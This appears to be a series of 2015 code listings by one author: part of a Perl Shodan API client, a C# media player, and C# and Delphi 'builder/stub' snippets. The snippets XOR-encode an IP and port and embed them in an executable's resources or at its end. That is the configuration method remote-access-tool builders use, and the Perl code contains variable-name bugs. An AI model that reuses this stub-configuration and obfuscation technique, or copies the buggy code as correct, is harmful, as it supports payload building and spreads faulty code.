printear("[+] Value : ");
print $value. "\n";
}
if ( $count ne "" ) {
printear("[+] Count : ");
print $count. "\n";
}
print "\n-------------------------------------\n";
if ( $i % 5 == 0 ) {
printear("\n[+] Press enter to show more\n");
<STDIN>;
}
}
}
sub by_query_search {
my $query = $_[0];
printear_titulo(
"\n[+] Searching in the directory of saved search queries ...\n\n");
my $code =
toma( "https://api.shodan.io/shodan/query/search?key="
. $api_key
. "&query="
. $query );
$resultado = JSON->new->decode($code);
my $total = $resultado->{'total'};
if ( $total ne "" ) {
printear("[+] Total : ");
print $total. "\n\n";
}
else {
printear("[-] WTF !");
}
my $i = 0;
my @encontrados = @{ $resultado->{'matches'} };
foreach my $encontrado (@encontrados) {
$i++;
print "-------------------------------------\n\n";
my $votes = $encontrado->{"votes"};
my $description = $encontrado->{"description"};
my $title = $encontrados->{"title"};
my $timestamp = $encontrados->{"timestamp"};
my $query = $encontrados->{"query"};
if ( $votes ne "" ) {
printear("[+] Votes : ");
print $votes. "\n";
}
if ( $description ne "" ) {
printear("[+] Description : ");
print $description. "\n\n";
}
if ( $title ne "" ) {
printear("[+] Title : ");
print $title. "\n";
}
if ( $timestamp ne "" ) {
printear("[+] Timestamp : ");
print $timestamp. "\n";
}
if ( $query ne "" ) {
printear("[+] Query : ");
print $query. "\n";
}
printear("[+] Tags : ");
my @tags = @{ $encontrado->{'tags'} };
foreach my $tag (@tags) {
print $tag. "\t";
}
print "\n";
print "\n-------------------------------------\n";
if ( $i % 5 == 0 ) {
printear("\n[+] Press enter to show more\n");
<STDIN>;
}
}
}
sub by_query {
printear_titulo("\n[+] Listening the saved search queries ...\n\n");
my $code = toma( "https://api.shodan.io/shodan/query?key=" . $api_key );
$resultado = JSON->new->decode($code);
my $total = $resultado->{'total'};
if ( $total ne "" ) {
printear("[+] Total : ");
print $total. "\n\n";
}
else {
printear("[-] WTF !");
}
my $i = 0;
my @encontrados = @{ $resultado->{'matches'} };
foreach my $encontrado (@encontrados) {
$i++;
print "-------------------------------------\n\n";
my $votes = $encontrado->{"votes"};
my $description = $encontrado->{"description"};
my $title = $encontrados->{"title"};
my $timestamp = $encontrados->{"timestamp"};
my $query = $encontrados->{"query"};
if ( $votes ne "" ) {
printear("[+] Votes : ");
print $votes. "\n";
}
if ( $description ne "" ) {
printear("[+] Description : ");
print $description. "\n\n";
}
if ( $title ne "" ) {
printear("[+] Title : ");
print $title. "\n";
}
if ( $timestamp ne "" ) {
printear("[+] Timestamp : ");
print $timestamp. "\n";
}
if ( $query ne "" ) {
printear("[+] Query : ");
print $query. "\n";
}
printear("[+] Tags : ");
my @tags = @{ $encontrado->{'tags'} };
foreach my $tag (@tags) {
print $tag. "\t";
}
print "\n";
print "\n-------------------------------------\n";
if ( $i % 5 == 0 ) {
printear("\n[+] Press enter to show more\n");
<STDIN>;
}
}
}
sub list_services {
printear_titulo("\n[+] Listening all services that Shodan crawls ...\n\n");
my $code = toma( "https://api.shodan.io/shodan/services?key=" . $api_key );
if ( $code ne "" ) {
my $i = 0;
while ( $code =~ /"(.*?)": "(.*?)"/migs ) {
$i++;
my $port = $1;
my $name = $2;
printear("[+] Port : ");
print $port. "\n";
printear("[+] Name : ");
print $name. "\n\n";
if ( $i % 20 == 0 ) {
printear("\n[+] Press enter to show more\n");
<STDIN>;
}
}
}
else {
print "[-] WTF !" . "\n";
}
}
sub resolve {
my $hostnames = $_[0];
printear_titulo("\n[+] Working in DNS Lookup ...\n\n");
my $code =
toma( "https://api.shodan.io/dns/resolve?hostnames="
. $hostnames . "&key="
. $api_key );
if ( $code ne "" ) {
while ( $code =~ /"(.*?)": "(.*?)"/migs ) {
my $host = $1;
my $ip = $2;
printear("[+] Hostname : ");
print $host. "\n";
printear("[+] IP : ");
print $ip. "\n";
}
}
else {
printear( "[-] WTF !" . "\n" );
}
}
sub reverse_now {
$ips = $_[0];
printear_titulo("\n[+] Working in Reverse DNS Lookup ...\n\n");
my $code = toma(
"https://api.shodan.io/dns/reverse?ips=" . $ips . "&key=" . $api_key );
if ( $code ne "" ) {
while ( $code =~ /"(.*?)": \["(.*?)"\]/migs ) {
my $ip = $1;
my $host = $2;
printear("[+] IP : ");
print $ip. "\n";
printear("[+] Hostname : ");
print $host. "\n";
}
}
else {
printear( "[-] WTF !" . "\n" );
}
}
sub my_ip {
printear_titulo("\n[+] Getting your IP ...\n\n");
my $code = toma( "https://api.shodan.io/tools/myip?key=" . $api_key );
if ( $code =~ /"(.*)"/ ) {
my $ip = $1;
printear("[+] IP : ");
print $ip. "\n";
}
else {
printear( "[-] WTF !" . "\n" );
}
}
sub api_info {
printear_titulo("\n[+] Getting your API Info ...\n\n");
my $code = toma( "https://api.shodan.io/api-info?key=" . $api_key );
$resultado = JSON->new->decode($code);
my $unlock_left = $resultado->{"unlocked_left"};
my $telnet = $resultado->{"telnet"};
my $plan = $resultado->{"plan"};
my $http = $resultado->{"https"};
my $unlocked = $resultado->{"unlocked"};
if ( $unlock_left ne "" ) {
printear("[+] Unlocked left : ");
print $unlock_left. "\n";
}
if ( $telnet ne "" ) {
printear("[+] Telnet : ");
print $telnet. "\n";
}
if ( $plan ne "" ) {
printear("[+] Plan : ");
print $plan. "\n";
}
if ( $http ne "" ) {
printear("[+] HTTPS : ");
print $http. "\n";
}
if ( $unlocked ne "" ) {
printear("[+] Unlocked : ");
print $unlocked. "\n";
}
}
sub by_count {
my $query = $_[0];
my $fecets = "";
printear_titulo("\n[+] Searching in Shodan without Results ...\n\n");
my $code =
toma( "https://api.shodan.io/shodan/host/count?key="
. $api_key
. "&query="
. $query
. "&facets="
. $facets );
$resultado = JSON->new->decode($code);
my $total = $resultado->{"total"};
if ( $total ne "" ) {
printear("[+] Total : ");
print $total. "\n";
}
else {
printear( "[-] WTF !" . "\n" );
}
}
sub by_ip {
my $target = $_[0];
printear("\n[+] Target : ");
print $target. "\n";
printear_titulo("\n[+] Getting Host Information ...\n\n");
my $code = toma(
"https://api.shodan.io/shodan/host/" . $target . "?key=" . $api_key );
$resultado = JSON->new->decode($code);
my $ip = $resultado->{'ip'};
my $country_name = $resultado->{'country_name'};
my $country_code = $resultado->{'country_code'};
my $region_name = $resultado->{'region_name'};
my $postal_code = $resultado->{'postal_code'};
if ( $ip ne "" ) {
printear("[+] IP : ");
print $ip. "\n";
}
if ( $country_name ne "" ) {
printear("[+] Country Name : ");
print $country_name. "\n";
}
if ( $country_code ne "" ) {
printear("[+] Country Code : ");
print $country_code. "\n";
}
if ( $region_name ne "" ) {
printear("[+] Area Code : ");
print $region_name. "\n";
}
if ( $postal_code ne "" ) {
printear("[+] Postal Code : ");
print $postal_code. "\n";
}
printear("[+] Hostnames : ");
my @hostnames = @{ $resultado->{'hostnames'} };
foreach my $host (@hostnames) {
print $host. "\t";
}
print "\n";
printear_titulo("\n[+] Getting Data ...\n\n");
my $i = 0;
my @encontrados = @{ $resultado->{'data'} };
foreach my $encontrado (@encontrados) {
$i++;
print "-------------------------------------\n\n";
my $ip = $encontrado->{"ip_str"};
my $country = $encontrado->{"location"}{"country_name"};
my $product = $encontrado->{"product"};
my $version = $encontrado->{"version"};
my $data = $encontrado->{"data"};
my $cpe = $encontrado->{"cpe"};
my $time = $encontrado->{"timestamp"};
my $last_updated = $encontrado->{"last_update"};
my $port = $encontrado->{"port"};
my $os = $encontrado->{"os"};
my $isp = $encontrado->{"isp"};
my $ans = $encontrado->{"ans"};
my $banner = $encontrado->{"banner"};
if ( $ip ne "" ) {
printear("[+] IP : ");
print $ip. "\n";
}
if ( $port ne "" ) {
printear("[+] Port : ");
print $port. "\n";
}
printear("[+] Hostnames : ");
my @hostnames2 = @{ $encontrado->{'hostnames'} };
foreach my $host2 (@hostnames2) {
print $host2. "\t";
}
print "\n";
if ( $country ne "" ) {
printear("[+] Country : ");
print $country. "\n";
}
if ( $product ne "" ) {
printear("[+] Product : ");
print $product. "\n";
}
if ( $version ne "" ) {
printear("[+] Version : ");
print $version. "\n";
}
if ( $data ne "" ) {
printear("[+] Data : ");
print "\n\n" . $data . "\n";
}
if ( $time ne "" ) {
printear("[+] Time : ");
print $time. "\n";
}
if ( $last_updated ne "" ) {
printear("[+] Last Updated : ");
print $last_updated. "\n";
}
if ( $cpe ne "" ) {
printear("[+] CPE : ");
print $cpe. "\n";
}
if ( $os ne "" ) {
printear("[+] OS : ");
print $os. "\n";
}
if ( $isp ne "" ) {
printear("[+] ISP : ");
print $isp. "\n";
}
if ( $asn ne "" ) {
printear("[+] ASN : ");
print $ans. "\n";
}
if ( $banner ne "" ) {
printear("[+] Banner : ");
print $banner. "\n";
}
print "\n-------------------------------------\n";
if ( $i % 5 == 0 ) {
printear("\n[+] Press enter to show more\n");
<STDIN>;
}
}
}
sub by_search {
my $target = $_[0];
printear("[+] Target : ");
print $target. "\n";
printear_titulo("\n[+] Searching in Shodan ...\n\n");
my $code =
toma( "https://api.shodan.io/shodan/host/search?key="
. $api_key
. "&query="
. $target
. "&facets=" );
$resultado = JSON->new->decode($code);
my $total = $resultado->{'total'};
if ( $total ne "" ) {
printear("[+] Total : ");
print $total. "\n";
}
else {
printear("[-] WTF !");
}
my $ip = $resultado->{'ip'};
my $country_name = $resultado->{'country_name'};
my $country_code = $resultado->{'country_code'};
my $region_name = $resultado->{'region_name'};
my $postal_code = $resultado->{'postal_code'};
if ( $ip ne "" ) {
printear("[+] IP : ");
print $ip. "\n";
}
if ( $country_name ne "" ) {
printear("[+] Country Name : ");
print $country_name. "\n";
}
if ( $country_code ne "" ) {
printear("[+] Country Code : ");
print $country_code. "\n";
}
if ( $region_name ne "" ) {
printear("[+] Area Code : ");
print $region_name. "\n";
}
if ( $postal_code ne "" ) {
printear("[+] Postal Code : ");
print $postal_code. "\n";
}
if ( $resultado->{'hostnames'}[0] ne "" ) {
printear("[+] Hostnames : ");
my @hostnames = @{ $resultado->{'hostnames'} };
foreach my $host (@hostnames) {
print $host. "\t";
}
print "\n";
}
printear_titulo("\n[+] Getting Data ...\n\n");
my $i = 0;
my @encontrados = @{ $resultado->{'matches'} };
foreach my $encontrado (@encontrados) {
$i++;
print "-------------------------------------\n\n";
my $ip = $encontrado->{"ip_str"};
my $country = $encontrado->{"location"}{"country_name"};
my $product = $encontrado->{"product"};
my $version = $encontrado->{"version"};
my $data = $encontrado->{"data"};
my $cpe = $encontrado->{"cpe"};
my $time = $encontrado->{"timestamp"};
my $last_updated = $encontrado->{"last_update"};
my $port = $encontrado->{"port"};
my $os = $encontrado->{"os"};
my $isp = $encontrado->{"isp"};
my $ans = $encontrado->{"ans"};
my $banner = $encontrado->{"banner"};
if ( $ip ne "" ) {
printear("[+] IP : ");
print $ip. "\n";
}
if ( $port ne "" ) {
printear("[+] Port : ");
print $port. "\n";
}
printear("[+] Hostnames : ");
my @hostnames2 = @{ $encontrado->{'hostnames'} };
foreach my $host2 (@hostnames2) {
print $host2. "\t";
}
print "\n";
if ( $country ne "" ) {
printear("[+] Country : ");
print $country. "\n";
}
if ( $product ne "" ) {
printear("[+] Product : ");
print $product. "\n";
}
if ( $version ne "" ) {
printear("[+] Version : ");
print $version. "\n";
}
if ( $data ne "" ) {
printear("[+] Data : ");
print "\n\n" . $data . "\n";
}
if ( $time ne "" ) {
printear("[+] Time : ");
print $time. "\n";
}
if ( $last_updated ne "" ) {
printear("[+] Last Updated : ");
print $last_updated. "\n";
}
if ( $cpe ne "" ) {
printear("[+] CPE : ");
print $cpe. "\n";
}
if ( $os ne "" ) {
printear("[+] OS : ");
print $os. "\n";
}
if ( $isp ne "" ) {
printear("[+] ISP : ");
print $isp. "\n";
}
if ( $asn ne "" ) {
printear("[+] ASN : ");
print $ans. "\n";
}
if ( $banner ne "" ) {
printear("[+] Banner : ");
print $banner. "\n";
}
print "\n-------------------------------------\n";
if ( $i % 5 == 0 ) {
printear("\n[+] Press enter to show more\n");
<STDIN>;
}
}
}
sub printear {
cprint( "\x036" . $_[0] . "\x030" );
}
sub printear_logo {
cprint( "\x037" . $_[0] . "\x030" );
}
sub printear_titulo {
cprint( "\x0310" . $_[0] . "\x030" );
}
sub toma {
return $nave->get( $_[0] )->content;
}
sub sintax {
printear("\n[+] Sintax : ");
print "perl $0 <option> <value>\n";
printear("\n[+] Options : \n\n");
print "-ip <ip> : Host Information\n";
print "-count <query> : Search Shodan without Results\n";
print "-search <query> : Search Shodan\n";
print "-query : List the saved search queries\n";
print
"-query_search <query> : Search the directory of saved search queries\n";
print "-query_tags : List the most popular tags\n";
print "-services : List all services that Shodan crawls\n";
print "-resolve <host> : DNS Lookup\n";
print "-reverse <ip> : Reverse DNS Lookup\n";
print "-myip : My IP Address\n";
print "-api_info : API Plan Information\n";
printear("\n[+] Example : ");
print "perl shodan.pl -search petardas\n";
copyright();
}
sub head {
printear_logo("\n-- == Shodan Tool 0.6 == --\n\n");
}
sub copyright {
printear_logo("\n\n-- == (C) Doddy Hackman 2015 == --\n\n");
exit(1);
}
# The End ?
// DH Player 1.0
// (C) Doddy Hackman 2015
// Credits :
// Based on : MP3 Happy Hard Core Player V 1.0 By Steel Karpov
// Thanks to Steel Karpov
using System;
using System.Collections.Generic;
using System.Text;
using System.Windows;
using System.Windows.Controls;
using System.Windows.Data;
using System.Windows.Documents;
using System.Windows.Input;
using System.Windows.Media;
using System.Windows.Media.Imaging;
using System.Windows.Navigation;
using System.Windows.Shapes;
using Microsoft.Win32;
using System.IO;
using System.Windows.Threading;
using System.Text.RegularExpressions;
namespace DH_Player
{
/// <summary>
/// Lógica de interacción para MainWindow.xaml
/// </summary>
public partial class MainWindow : Window
{
DispatcherTimer control_del_tiempo;
bool escribiendo;
bool enalgo;
bool repeat;
bool automatic;
bool pantalla_completa = false;
public MainWindow()
{
InitializeComponent();
control_del_tiempo = new DispatcherTimer();
control_del_tiempo.Interval = TimeSpan.FromSeconds(1);
control_del_tiempo.Tick += new EventHandler(timer_Tick);
escribiendo = false;
}
private void timer_Tick(object sender, EventArgs e)
{
if (!escribiendo)
{
linea.Value = player.Position.TotalSeconds;
}
}
private void retroceder_MouseUp(object sender, MouseButtonEventArgs e)
{
if (lista.SelectedIndex != -1)
{
cancion_anterior();
}
}
private void play_MouseUp(object sender, MouseButtonEventArgs e)
{
if (lista.SelectedIndex != -1)
{
enalgo = true;
player.Play();
}
}
private void pause_MouseUp(object sender, MouseButtonEventArgs e)
{
if (lista.SelectedIndex != -1)
{
player.Pause();
enalgo = false;
}
}
private void avanzar_MouseUp(object sender, MouseButtonEventArgs e)
{
if (lista.SelectedIndex != -1)
{
cancion_siguiente();
}
}
private void nombres_MouseDoubleClick(object sender, MouseButtonEventArgs e)
{
if (lista.SelectedIndex != -1)
{
enalgo = false;
start_music();
}
}
private void start_music()
{
if (enalgo == true)
{
player.Play();
}
else
{
ListBoxItem ruta1 = (ListBoxItem)lista.SelectedItem;
string ruta = ruta1.Tag.ToString();
player.Position = TimeSpan.Zero;
player.LoadedBehavior = MediaState.Manual;
player.UnloadedBehavior = MediaState.Stop;
player.Source = new Uri(ruta);
linea.Value = 0;
player.Play();
}
}
private void cancion_siguiente()
{
enalgo = false;
try
{
if (lista.SelectedIndex + 1 < lista.Items.Count)
{
lista.SelectedItem = lista.Items.GetItemAt(lista.SelectedIndex + 1);
start_music();
}
}
catch
{
//
}
}
private void cancion_anterior()
{
enalgo = false;
try
{
if (lista.SelectedIndex - 1 < lista.Items.Count)
{
lista.SelectedItem = lista.Items.GetItemAt(lista.SelectedIndex - 1);
start_music();
}
}
catch
{
//
}
}
private void volumen_ValueChanged(object sender, RoutedPropertyChangedEventArgs<double> e)
{
try
{
player.Volume = volumen.Value;
}
catch
{
//
}
}
private void player_MouseDown(object sender, MouseButtonEventArgs e)
{
int width_screen = 1400;
int height_screen = 800;
int width_original = 483;
int height_original = 372;
if (e.ClickCount == 2 && pantalla_completa == false)
{
player.MinHeight = height_screen;
player.MinWidth = width_screen;
volumen.Visibility = Visibility.Hidden;
linea.Visibility = Visibility.Hidden;
play.Visibility = Visibility.Hidden;
pause.Visibility = Visibility.Hidden;
avanzar.Visibility = Visibility.Hidden;
retroceder.Visibility = Visibility.Hidden;
contenedor1.Visibility = Visibility.Hidden;
contenedor2.Visibility = Visibility.Hidden;
lista.Visibility = Visibility.Hidden;
menu1.Visibility = Visibility.Hidden;
progreso.Visibility = Visibility.Hidden;
this.WindowStyle = WindowStyle.None;
this.WindowState = WindowState.Maximized;
pantalla_completa = true;
}
else
{
if (e.ClickCount == 2 && pantalla_completa == true)
{
player.MinHeight = height_original;
player.MinWidth = width_original;
volumen.Visibility = Visibility.Visible;
linea.Visibility = Visibility.Visible;
play.Visibility = Visibility.Visible;
pause.Visibility = Visibility.Visible;
avanzar.Visibility = Visibility.Visible;
retroceder.Visibility = Visibility.Visible;
contenedor1.Visibility = Visibility.Visible;
contenedor2.Visibility = Visibility.Visible;
lista.Visibility = Visibility.Visible;
menu1.Visibility = Visibility.Visible;
progreso.Visibility = Visibility.Visible;
this.WindowStyle = WindowStyle.SingleBorderWindow;
this.WindowState = WindowState.Normal;
pantalla_completa = false;
}
}
}
private void player_MediaOpened(object sender, RoutedEventArgs e)
{
enalgo = true;
if (player.NaturalDuration.HasTimeSpan)
{
TimeSpan ts = player.NaturalDuration.TimeSpan;
linea.Maximum = ts.TotalSeconds;
linea.SmallChange = 1;
}
control_del_tiempo.Start();
}
private void player_MediaEnded(object sender, RoutedEventArgs e)
{
linea.Value = 0;
enalgo = false;
if (repeat == true)
{
start_music();
}
if (automatic == true)
{
cancion_siguiente();
}
}
private void linea_DragStarted(object sender, System.Windows.Controls.Primitives.DragStartedEventArgs e)
{
escribiendo = true;
}
private void linea_DragCompleted(object sender, System.Windows.Controls.Primitives.DragCompletedEventArgs e)
{
escribiendo = false;
player.Position =
TimeSpan.FromSeconds(linea.Value);
}
private void linea_MouseLeftButtonUp(object sender, MouseButtonEventArgs e)
{
player.Position = TimeSpan.FromSeconds(linea.Value);
}
private void linea_ValueChanged(object sender, RoutedPropertyChangedEventArgs<double> e)
{
try
{
string tiempo = TimeSpan.FromSeconds(linea.Value).ToString();
int cantidad = (int)player.NaturalDuration.TimeSpan.TotalSeconds;
TimeSpan tiempo_final = TimeSpan.FromSeconds(cantidad);
Match regex = Regex.Match(tiempo, @"(.*)\.(.*)", RegexOptions.IgnoreCase);
if (regex.Success)
{
progreso.Content = regex.Groups[1].Value + " / " + tiempo_final;
}
}
catch
{
//
}
}
private void nombres_DragEnter(object sender, DragEventArgs e)
{
if (e.Data.GetDataPresent(DataFormats.FileDrop))
{
e.Effects = DragDropEffects.Copy;
}
else
{
e.Effects = DragDropEffects.None;
}
}
private void nombres_Drop(object sender, DragEventArgs e)
{
List<string> archivos = new List<string>((string[])e.Data.GetData(DataFormats.FileDrop));
foreach (string archivo in archivos)
{
string nombre = System.IO.Path.GetFileNameWithoutExtension(archivo);
string extension = System.IO.Path.GetExtension(archivo);
if (extension == ".mp3" || extension == ".avi" || extension==".m4a" || extension==".wma" || extension==".mp4" || extension==".flv" || extension==".mkv" || extension==".wmv" || extension==".mpg")
{
ListBoxItem item1 = new ListBoxItem();
item1.Content = nombre;
item1.Tag = archivo;
lista.Items.Add(item1);
}
}
}
private void MenuItem_Click(object sender, RoutedEventArgs e)
{
OpenFileDialog openFileDialog1 = new OpenFileDialog();
openFileDialog1.Filter = "MP3 (.mp3)|*.mp3|M4A (.m4a)|*.m4a|WMA (.wma)|*.m4a";
openFileDialog1.InitialDirectory = Environment.GetFolderPath(Environment.SpecialFolder.MyMusic);
openFileDialog1.Multiselect = true;
openFileDialog1.Title = "Select Song";
Nullable<bool> result = openFileDialog1.ShowDialog();
if (result == true)
{
string[] archivos = openFileDialog1.FileNames;
foreach (string archivo in archivos)
{
string nombre = System.IO.Path.GetFileNameWithoutExtension(archivo);
ListBoxItem item1 = new ListBoxItem();
item1.Content = nombre;
item1.Tag = archivo;
lista.Items.Add(item1);
}
}
}
private void MenuItem_Click_1(object sender, RoutedEventArgs e)
{
OpenFileDialog openFileDialog1 = new OpenFileDialog();
openFileDialog1.Filter = "MP3 (.mp3)|*.mp3|M4A (.m4a)|*.m4a|WMA (.wma)|*.m4a";
openFileDialog1.InitialDirectory = Environment.GetFolderPath(Environment.SpecialFolder.MyMusic);
openFileDialog1.Multiselect = true;
openFileDialog1.Title = "Select Song";
Nullable<bool> result = openFileDialog1.ShowDialog();
if (result == true)
{
string directorio = System.IO.Path.GetDirectoryName(openFileDialog1.FileName);
string[] archivos = Directory.GetFiles(directorio);
foreach (string archivo in archivos)
{
string extension = System.IO.Path.GetExtension(archivo);
if (extension == ".mp3" || extension == ".m4a" || extension==".wma")
{
string nombre = System.IO.Path.GetFileNameWithoutExtension(archivo);
ListBoxItem item1 = new ListBoxItem();
item1.Content = nombre;
item1.Tag = archivo;
lista.Items.Add(item1);
}
}
}
}
private void MenuItem_Click_2(object sender, RoutedEventArgs e)
{
OpenFileDialog openFileDialog1 = new OpenFileDialog();
openFileDialog1.Filter = "avi (.avi)|*.avi|mp4 (.mp4)|*.mp4|flv (.flv)|*.flv|mkv (.mkv)|*.mkv|wmv (.wmv)|*.wmv|mpg (.mpg)|*.mpg";
openFileDialog1.InitialDirectory = Environment.GetFolderPath(Environment.SpecialFolder.MyMusic);
openFileDialog1.Multiselect = true;
openFileDialog1.Title = "Select Video";
Nullable<bool> result = openFileDialog1.ShowDialog();
if (result == true)
{
string[] archivos = openFileDialog1.FileNames;
foreach (string archivo in archivos)
{
string nombre = System.IO.Path.GetFileNameWithoutExtension(archivo);
ListBoxItem item1 = new ListBoxItem();
item1.Content = nombre;
item1.Tag = archivo;
lista.Items.Add(item1);
}
}
}
private void MenuItem_Click_3(object sender, RoutedEventArgs e)
{
OpenFileDialog openFileDialog1 = new OpenFileDialog();
openFileDialog1.Filter = "avi (.avi)|*.avi|mp4 (.mp4)|*.mp4|flv (.flv)|*.flv|mkv (.mkv)|*.mkv|wmv (.wmv)|*.wmv|mpg (.mpg)|*.mpg";
openFileDialog1.InitialDirectory = Environment.GetFolderPath(Environment.SpecialFolder.MyMusic);
openFileDialog1.Multiselect = true;
openFileDialog1.Title = "Select Videos";
Nullable<bool> result = openFileDialog1.ShowDialog();
if (result == true)
{
string directorio = System.IO.Path.GetDirectoryName(openFileDialog1.FileName);
string[] archivos = Directory.GetFiles(directorio);
foreach (string archivo in archivos)
{
string extension = System.IO.Path.GetExtension(archivo);
if (extension == ".avi" || extension==".mp4" || extension ==".flv" || extension==".mkv" || extension ==".wmv" || extension==".mpg")
{
string nombre = System.IO.Path.GetFileNameWithoutExtension(archivo);
ListBoxItem item1 = new ListBoxItem();
item1.Content = nombre;
item1.Tag = archivo;
lista.Items.Add(item1);
}
}
}
}
private void MenuItem_Click_4(object sender, RoutedEventArgs e)
{
repeat = true;
}
private void MenuItem_Click_5(object sender, RoutedEventArgs e)
{
repeat = false;
}
private void MenuItem_Click_6(object sender, RoutedEventArgs e)
{
automatic = true;
}
private void MenuItem_Click_7(object sender, RoutedEventArgs e)
{
automatic = false;
}
private void MenuItem_Click_10(object sender, RoutedEventArgs e)
{
player.IsMuted = true;
}
private void MenuItem_Click_11(object sender, RoutedEventArgs e)
{
player.IsMuted = false;
}
private void MenuItem_Click_8(object sender, RoutedEventArgs e)
{
MessageBox.Show("Written By Doddy Hackman in the summer of 2015");
}
private void MenuItem_Click_9(object sender, RoutedEventArgs e)
{
Application.Current.Shutdown();
}
private void MenuItem_Click_12(object sender, RoutedEventArgs e)
{
lista.Items.Clear();
}
}
}
// The End ?
using System.CodeDom.Compiler;
using Microsoft.CSharp;
using System.IO;
using System.Resources;
private void button1_Click(object sender, EventArgs e)
{
string linea = "-ip-"+ip.Text+"-ip-"+"-port-"+port.Text+"-port-"; // Establecemos la variable "linea" como los datos de la IP y el puerto
System.Resources.ResourceWriter escribiendo = new System.Resources.ResourceWriter("configuration.resources"); // Empezamos a escribir el
// recurso "configuration"
escribiendo.AddResource("configuration",linea); // Agregamos el recurso "configuration" con los datos de la variable "linea"
escribiendo.Close(); // Guarda los recursos y se cierra
System.CodeDom.Compiler.CompilerParameters compilador = new System.CodeDom.Compiler.CompilerParameters(); // Iniciamos la instancia CompilerParameters
compilador.GenerateExecutable = true; // Aclaramos que queremos que genere un ejecutable
compilador.OutputAssembly = "stub.exe"; // Establecemos el nombre del ejecutable a generar
compilador.ReferencedAssemblies.Add("System.dll"); // Agregamos el ensamblado System
compilador.ReferencedAssemblies.Add("System.Windows.Forms.dll"); // Agregamos el ensamblado System.Windows.Forms
compilador.EmbeddedResources.Add("configuration.resources"); // Agregamos los recursos que se van a incluir en el ejecutable resultante
compilador.CompilerOptions += "/t:winexe"; // Establecemos los argumentos de la linea de comandos que usara el compilador
System.CodeDom.Compiler.CompilerResults final = new Microsoft.CSharp.CSharpCodeProvider().CompileAssemblyFromSource(compilador, Properties.Resources.stub);
// Compilamos el recurso
if (File.Exists("configuration.resources")) // Si existe el archivo "configuration.resources" ...
{
System.IO.File.Delete("configuration.resources"); // Lo borramos
}
MessageBox.Show("Done"); // Mostramos por pantalla un mensaje para decir que el stub esta listo
}
using System;
using System.Text;
using System.Windows.Forms;
using System.Resources;
using System.Text.RegularExpressions;
namespace stub
{
class Program
{
static void Main()
{
string ip = ""; // Declaramos la variable string "ip" que contendra la IP
string port = ""; // Declaramos la variable string "port" que contendra el puerto
ResourceManager leyendo_recurso = new ResourceManager("configuration", System.Reflection.Assembly.GetExecutingAssembly()); // Cargamos los datos
// del recurso "configuration"
string datos = leyendo_recurso.GetString("configuration"); // Leemos los datos del recurso "configuration"
Match regex = Regex.Match(datos, "-ip-(.*?)-ip--port-(.*?)-port-", RegexOptions.IgnoreCase); // Usamos una expresion regular para buscar la IP
// y el puerto
if (regex.Success) // Si se encontro algo ...
{
ip = regex.Groups[1].Value; // Guardamos la IP encontrada en la variable "ip"
port = regex.Groups[2].Value; // Guardamos el puerto encontrado en la variable "port"
}
MessageBox.Show("[+] IP : " + ip); // Mostramos la IP con un mensaje usando la variable "ip"
MessageBox.Show("[+] Port : " + port); // Mostramos el puerto con un mensaje usando la variable "port"
}
}
}
// Class Name : Builder Tools
// Version : 0.1
// (C) Doddy Hackman 2015
//
// Examples :
//builder_tools tools = new builder_tools();
//tools.escribir_eof("stub.exe","hola mundo de ***** [ip]morite[ip][port]sdasd[port]","key");
//Console.Write(tools.leer_eof("stub.exe", "key"));
//
using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using System.Text.RegularExpressions;
namespace builder
{
class builder_tools
{
public string xor_now(string linea, string key)
{
// Credits : Based on http://stackoverflow.com/questions/2532668/help-me-with-xor-encryption
// Thanks to Daniel Earwicker
var contenido = new StringBuilder();
for (int i = 0; i < linea.Length; i++)
{
contenido.Append((char)((uint)linea[i] ^ (uint)key[i % key.Length]));
}
return contenido.ToString();
}
public bool escribir_eof(string archivo, string texto, string key)
{
string delimitador = "-0x646F646479206861636B6D616E-";
FileStream abriendo = new FileStream(archivo, FileMode.Append);
BinaryWriter seteando = new BinaryWriter(abriendo);
seteando.Write(delimitador + xor_now(texto, key) + delimitador);
seteando.Flush();
seteando.Close();
abriendo.Close();
return true;
}
public string leer_eof(string archivo, string key)
{
StreamReader viendo = new StreamReader(archivo);
string contenido = viendo.ReadToEnd();
string rta = "";
Match regex = Regex.Match(contenido, "-0x646F646479206861636B6D616E-(.*?)-0x646F646479206861636B6D616E-", RegexOptions.IgnoreCase);
if (regex.Success)
{
rta = xor_now(regex.Groups[1].Value, key);
}
else
{
rta = "WTF!";
}
return rta;
}
}
}
// The End ?
procedure TForm1.Button1Click(Sender: TObject);
var
archivo: string; // Declaramos la variable "archivo" como string
datos: string; // Declaramos la variable "datos" como string
clave: integer; // Declaramos la variable "clave" como integer
begin
archivo := 'stubnow.exe';
// Establecemos la variable "archivo" como el nombre del ejecutable
// que vamos abrir
datos := '[ip]' + ip.Text + '[ip]' + '[port]' + port.Text + '[port]';
// Establecemos los datos que contiene la IP y el puerto separados por etiquetas
// y los guardamos en la variable "datos"
clave := 123; // Establecemos la variable "clave" como "123"
escribir_recurso(archivo, datos, clave);
// Escribimos el recurso usando la funcion
// "escribir_recurso" usando como argumentos las variables que acabamos de establecer
ShowMessage('Done'); // Mostramos un mensaje en pantalla
end;
function xor_now(texto: string; clave: integer): string;
// Funcion xor_now con el argumento
// del texto a crifrar y la clave a usar
var
numero: integer; // Declaramos la variable "numero" como entero
contenido: string; // Declaramos la variable "contenido" como string
begin
contenido := ''; // Vaciamos la variable contenido
for numero := 1 to Length(texto) do // Realizamos un for del "1"
// a la longitud de la variable texto
begin
contenido := contenido + Char(integer(texto[numero]) xor clave);
// Realizamos el cifrado xor
end;
Result := contenido; // Devolvemos como resultado la variable "contenido"
end;
function escribir_recurso(ruta: string; datos: string; clave: integer): bool;
var
escribiendo: THandle; // Declaramos la variable "escribiendo" como THandle
begin
datos := xor_now('-0x646F646479206861636B6D616E-' + datos +
'-0x646F646479206861636B6D616E-', clave);
// Ciframos los datos usando la funcion xor_now
// Los parametros que usamos en la funcion xor_now son la variable "datos" como el texto
// a cifrar , los "datos" estan entre dos delimitadores para facilitar su busqueda y
// tambien usamos la variable "clave" como key en el cifrado xor
escribiendo := BeginUpdateResource(pchar(ruta), False);
// Empezamos el inicio de de la creacion
// del recurso usando la variable "ruta"
UpdateResource(escribiendo, MakeIntResource(10), 'CONFIGURATION', 0,
pchar(datos), (Length(datos) + 1) * SizeOf(datos[1]));
// Escribimos el recurso usando
// la variable "datos" como el contenido del recurso y como nombre del recurso usamos
// "CONFIGURATION"
EndUpdateResource(escribiendo, False); // Terminamos de crear el recurso
Result := True; // Devolvemos True como resultado de la funcion
end;
procedure TForm1.Button1Click(Sender: TObject);
var
